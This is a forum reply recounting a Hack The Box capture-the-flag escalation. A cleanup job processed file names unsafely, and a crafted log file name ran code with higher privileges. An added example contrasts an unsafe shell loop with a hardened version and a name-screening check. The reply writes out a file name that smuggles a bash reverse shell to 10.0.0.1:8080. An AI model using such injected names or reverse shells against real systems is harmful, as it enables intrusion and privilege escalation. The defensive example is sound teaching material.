Reply to post: Re: Broken NFS

A 1970s magic trick: Take a card, any card, out of the deck and watch the IBM System/370 plunge into a death spiral

el_oscuro
Linux

Re: Broken NFS

Everything old is new again. Working on a CTF in Hack The Box, I had a reverse shell but couldn't really do anything with it. There was only one log directory that was writeable, but I eventually figured out there was a cleanup job that deleted the files. By creating a filename with shell characters in it, I was able to get command execution with higher privileges when that process ran by naming the files something like:

hello.c; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

The hard part was figuring out how to get the special characters in the name. I don't remember what I had to do, but it can definitely be done.
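
Added example, not part of the comment above, which does not show the cleanup job itself: one assumed shape of such a flaw, a job that pastes file names into a shell command string, next to a version that passes names as arguments, plus an allowlist check for unusual names. The job's form and all function names are assumptions.

```shell
#!/bin/sh
# Added example; the job's form and all function names are assumptions.

# Assumed shape of the flaw: each file name is pasted into a command string
# that a second shell parses, so ';' or '&' in a name starts a new command.
unsafe_cleanup() (
    cd "$1" || exit 1
    for f in *; do
        sh -c "rm -f $f"    # BUG: name is interpreted as shell code
    done
)

# Hardened form: find hands each name to rm as one argv entry. No shell
# re-parses it, and '--' stops a leading '-' being read as an option.
safe_cleanup() {
    find "$1" -mindepth 1 -maxdepth 1 -type f -exec rm -f -- {} +
}

# Detection aid: list files whose names contain any character outside a
# conservative allowlist (letters, digits, '.', '_', '-').
flag_suspicious_names() {
    find "$1" -mindepth 1 -maxdepth 1 -type f -name '*[!A-Za-z0-9._-]*' -print
}
```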
